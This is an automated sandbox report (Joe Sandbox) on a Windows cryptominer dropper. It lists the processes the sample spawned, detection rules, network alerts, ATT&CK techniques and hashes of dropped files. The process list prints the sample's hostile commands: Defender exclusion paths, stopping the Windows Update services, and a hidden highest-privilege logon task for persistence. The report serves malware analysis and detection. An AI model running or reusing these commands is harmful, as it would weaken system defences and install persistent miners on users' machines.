Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- file.exe (PID: 7028 cmdline: C:\Users\user\Desktop\file.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343)
- dialer.exe (PID: 6996 cmdline: C:\Windows\System32\dialer.exe MD5: 0EC74656A7F7667DD94C76081B111827)
- winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F9017F2DC455AD373DF036F5817A8870)
- lsass.exe (PID: 612 cmdline: C:\Windows\system32\lsass.exe MD5: 317340CD278A374BCEF6A30194557227)
- WMIADAP.exe (PID: 5900 cmdline: wmiadap.exe /F /T /R MD5: 9783D0765F31980950445DFD40DB15DA)
- svchost.exe (PID: 740 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 904 cmdline: c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM MD5: 32569E403279B3FD2EDB7EBD036273FA)
- dwm.exe (PID: 992 cmdline: dwm.exe MD5: 70073A05B2B43FFB7A625708BB29E7C7)
- svchost.exe (PID: 356 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 464 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1048 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1064 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: 32569E403279B3FD2EDB7EBD036273FA)
- dxpserver.exe (PID: 2700 cmdline: C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe MD5: EEE7B971E0B76A0DF56BDAC2AC2FA343)
- svchost.exe (PID: 1120 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1208 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1304 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1376 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s Themes MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1384 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s EventSystem MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1396 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1496 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1548 cmdline: c:\windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1556 cmdline: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1564 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s FontCache MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1664 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1716 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s nsi MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1724 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1796 cmdline: c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1820 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 1828 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp MD5: 32569E403279B3FD2EDB7EBD036273FA)
- powershell.exe (PID: 7000 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 6760 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- sc.exe (PID: 5976 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 7068 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 3172 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 5672 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 5656 cmdline: sc stop dosvc MD5: D79784553A9410D15E04766AAAB77CD6)
- powershell.exe (PID: 3804 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iejbryoj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'sethc' /tr '''C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'sethc' -RunLevel 'Highest' -Force; } MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 3952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 4500 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 868 cmdline: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- sc.exe (PID: 5164 cmdline: sc stop UsoSvc MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 7008 cmdline: sc stop WaaSMedicSvc MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 3360 cmdline: sc stop wuauserv MD5: D79784553A9410D15E04766AAAB77CD6)
- sc.exe (PID: 1464 cmdline: sc stop bits MD5: D79784553A9410D15E04766AAAB77CD6)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | PUA_VULN_Driver_OpenLibSysorg_WinRingsys_WinRing_7Q9n | Detects vulnerable driver mentioned in LOLDrivers project using VersionInfo values from the PE header - 0c0195c48b6b8582fa6f6373032118da.bin, 27bcbeec8a466178a6057b64bef66512.bin | Florian Roth | |
| | XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems) | |
| | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth (Nextron Systems) | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | XMRIG_Monero_Miner | Detects Monero mining software | Florian Roth (Nextron Systems) | |
Operating System Destruction |
---|
Author: Joe Security

Timestamp | Source/Destination (IPs, ports and SID concatenated as extracted) | SID | Source Port | Destination Port | Protocol | Classtype |
---|---|---|---|---|---|---|
06/09/23-13:30:16.918144 | 192.168.2.6188.165.24.13149711802035420 | 2035420 | 49711 | 80 | TCP | A Network Trojan was detected |
06/09/23-13:30:16.918144 | 192.168.2.6188.165.24.13149711802011341 | 2011341 | 49711 | 80 | TCP | A Network Trojan was detected |
06/09/23-13:31:25.852328 | 192.168.2.6188.165.24.13149713802011341 | 2011341 | 49713 | 80 | TCP | A Network Trojan was detected |
06/09/23-13:31:25.852328 | 192.168.2.6188.165.24.13149713802035420 | 2035420 | 49713 | 80 | TCP | A Network Trojan was detected |
- AV Detection
- Bitcoin Miner
- Compliance
- Spreading
- Networking
- Operating System Destruction
- System Summary
- Data Obfuscation
- Persistence and Installation Behavior
- Boot Survival
- Hooking and other Techniques for Hiding and Protection
- Malware Analysis System Evasion
- Anti Debugging
- HIPS / PFW / Operating System Protection Evasion
- Language, Device and Operating System Detection
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Virustotal: |
Bitcoin Miner |
---|
Source: | File source: | ||
Source: | Static PE information: |
Source: | Code function: | ||
Networking |
---|
Source: | Snort IDS: | ||
Source: | String found in binary or memory: | ||
System Summary |
---|
Source: | Matched rule: | ||
Source: | File deleted: |
Source: | File created: |
Source: | Code function: | ||
Source: | File created: |
Source: | Static PE information: |
Source: | Dropped File: |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | File read: |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: | ||
Source: | Code function: |
Source: | File created: |
Source: | Classification label: |
Source: | Code function: |
Source: | Section loaded: | ||
Source: | Mutant created: | ||
Source: | Code function: |
Source: | File written: |
Source: | File opened: |
Source: | Static PE information: |
Source: | Static file information: |
Source: | Static PE information: |
Source: | Code function: | ||
Source: | Static PE information: | ||
Persistence and Installation Behavior |
---|
Source: | File source: | ||
Source: | File created: |
Boot Survival |
---|
Source: | File source: | ||
Source: | Registry key value modified: |
Source: | Process created: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | User mode code has changed: |
Source: | Module Loaded: | ||
Source: | IAT, EAT, inline or SSDT hook detected: |
Source: | Process information set: | ||
Malware Analysis System Evasion |
---|
Source: | Code function: |
Source: | Thread sleep time: | ||
Source: | Thread sleep count: | ||
Source: | Last function: | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | ||
Source: | Window / User API: | ||
Source: | Check user administrative privileges: |
Source: | Code function: |
Source: | Evasive API call chain: | ||
Source: | API coverage: | ||
Source: | Process information queried: |
Source: | Code function: | ||
Source: | Thread delayed: | ||
Source: | API call chain: |
Source: | Binary or memory string: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Process token adjusted: | ||
Source: | Code function: | ||
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Section loaded: | ||
Source: | Memory written: | ||
Source: | Memory allocated: | ||
Source: | Memory written: | ||
Source: | Code function: |
Source: | Thread register set: | ||
Source: | Thread created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Queries volume information: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | 21 Windows Service | 1 Access Token Manipulation | 4 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Service Execution | 1 DLL Side-Loading | 21 Windows Service | 11 Masquerading | LSASS Memory | 221 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Native API | Logon Script (Windows) | 712 Process Injection | 1 Disable or Modify Tools | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | 1 DLL Side-Loading | 31 Virtualization/Sandbox Evasion | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 712 Process Injection | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 22 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Obfuscated Files or Information | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 File Deletion | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 41% | ReversingLabs | Win64.Trojan.Barys | |
| | 35% | Virustotal | | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 100% | Joe Sandbox ML | | |
| | 44% | ReversingLabs | Win64.Trojan.DisguisedXMRigMiner | |
| | 64% | Virustotal | | Browse |
| | 5% | ReversingLabs | | |
| | 2% | Virustotal | | Browse |
| | 41% | ReversingLabs | Win64.Trojan.Barys | |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | URL Reputation | safe | |
| | 0% | Avira URL Cloud | safe | |
| | 0% | Avira URL Cloud | safe | |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | | false | | high |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | high |
| | | false | | high |
| | | false | | unknown |
| | | false | | high |
| | | false | | unknown |
| | | false | | high |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | unknown |
| | | false | | high |
| | | false | | high |
| | | false | | unknown |
Joe Sandbox Version: | 37.1.0 Beryl |
Analysis ID: | 884914 |
Start date and time: | 2023-06-09 13:28:13 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 13m 2s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 26 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 25 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | file.exe |
Detection: | MAL |
Classification: | mal100.troj.evad.mine.winEXE@44/68@0/0 |
EGA Information: | |
HDC Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): conhost.exe, WmiPrvSE.exe, schtasks.exe
- Excluded domains from analysis (whitelisted): gulf.moneroocean.stream, conn.gta5cheatcode.world, pastebin.com, ppanel.freaktorrentz.xyz
- Execution Graph export aborted for target file.exe, PID 7028 because it is empty
- Execution Graph export aborted for target powershell.exe, PID 3804 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
13:29:08 | API Interceptor | |
13:29:19 | API Interceptor | |
13:29:38 | Task Scheduler | |
13:30:04 | API Interceptor |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.34726597513537405 |
Encrypted: | false |
SSDEEP: | 3:Nlll:Nll |
MD5: | 446DD1CF97EABA21CF14D03AEBC79F27 |
SHA1: | 36E4CC7367E0C7B40F4A8ACE272941EA46373799 |
SHA-256: | A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF |
SHA-512: | A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5536256 |
Entropy (8bit): | 6.689058470432344 |
Encrypted: | false |
SSDEEP: | 98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6 |
MD5: | 8FA2F1BA9B9A7EA2B3C4DD627C627CEC |
SHA1: | 358E3800286E5D4C5662366AD7311BC5A51BA497 |
SHA-256: | 78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947 |
SHA-512: | 74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775 |
Malicious: | true |
Yara Hits: | |
Antivirus: | |
Preview: |
Process: | C:\Users\user\AppData\Roaming\Microsoft\dxpserver.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14544 |
Entropy (8bit): | 6.2660301556221185 |
Encrypted: | false |
SSDEEP: | 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ |
MD5: | 0C0195C48B6B8582FA6F6373032118DA |
SHA1: | D25340AE8E92A6D29F599FEF426A2BC1B5217299 |
SHA-256: | 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5 |
SHA-512: | AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D |
Malicious: | true |
Yara Hits: | |
Antivirus: | |
Preview: |
Process: | C:\Users\user\Desktop\file.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10264640 |
Entropy (8bit): | 7.644002604978999 |
Encrypted: | false |
SSDEEP: | 98304:AScdwkEObD07UX4SIf6Ky9UBMJs52fvaUhOAllh3uJZbZSvHzmmkvgDlWBixnxCa:Ald3Z0I2T0gAfCbZSvTlRXqbtci+ |
MD5: | EEE7B971E0B76A0DF56BDAC2AC2FA343 |
SHA1: | C80F9D9DE5D0DFF115BBB7638554DADE321D7C65 |
SHA-256: | ECD60313BA990F1300B37DB4064977E83F109FDF93A728CF434106C1B5B5A2D5 |
SHA-512: | FFFD216C820B3BE324AC72A46C50683B42218DEAF95C219670C3F44C091424E8ED5FC42B28F4AAB46E8024A52CBE4CA989031CA3641536F3FAE0A2B5F4F79E85 |
Malicious: | true |
Antivirus: | |
Preview: |
Process: | C:\Windows\System32\wbem\WMIADAP.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3444 |
Entropy (8bit): | 5.011954215267298 |
Encrypted: | false |
SSDEEP: | 48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW |
MD5: | B133A676D139032A27DE3D9619E70091 |
SHA1: | 1248AA89938A13640252A79113930EDE2F26F1FA |
SHA-256: | AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15 |
SHA-512: | C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\wbem\WMIADAP.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 924 |
Entropy (8bit): | 2.8598329685344623 |
Encrypted: | false |
SSDEEP: | 12:Q1NXCaAGaCGopGGD1JTi0SMfmCwOx6ivG:Q3wU/IM1x6oG |
MD5: | 2667367F9339639AF825E7122CE3B2A3 |
SHA1: | 56E33B464F9AD8D0A6AC3343A85D7618D590FEDC |
SHA-256: | B2353629E198C2F5244BC75AD797789FFBCA2CED084D731084AF312AD6DCBE7F |
SHA-512: | A214C16977CFD760929F76D33DBA89277C6BC7B5948ACFBD89D6AF4A688B9F421D3D2860E1CAE81436E05A52FFED92B04AA2ABBF70CE7231A053BD3E724F3EA9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.2640752180121995 |
Encrypted: | false |
SSDEEP: | 384:AhO7X/cfpYaTjLjVnrRcF36QoXmH4yH631Sy7omGd4e4BZiLqwV:Aw7X/cfJf4F36QoXmYyHgScomGd4e0i |
MD5: | 3DE60C311BA5F4294721C9FBF4A37053 |
SHA1: | A299F68A8A79845B296142D2E556930913AFE3D5 |
SHA-256: | D00B8F740A149BC47FFEE0E071EA21376257208357AFB8CD57C3E3CC39421A5A |
SHA-512: | ACA307930C90095207342AC8866416E8517F593640ECD140679761A9111223299E5C8C126FB8DF84F4A02DD02A829E24EA7AB6FBCFF9D947D75B125C915C5A59 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 4.347250455983504 |
Encrypted: | false |
SSDEEP: | 768:TDw9YZvRDamznmD7zMUkgzBu5ndlhoT/qBs8jegk8FW:3WYZJDamzUVkgz |
MD5: | FF0FD6409A56C7FE0AA6D1E4B003B279 |
SHA1: | 250FCA49B543051D7ACBE9B3A22D20B3F7336CC7 |
SHA-256: | 75DB5782AC99B761C766463592578BB6453181DC04BD93CD5A805BACA158F301 |
SHA-512: | C3CF53C18D7BDF72E8C7CC2D8F0F8ADB40C2AB75DB332F66BB7138C4B41D8B454601B44DD38140A8E14CB08B26F14289B976FBAD18695C392C251F8C493E3435 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
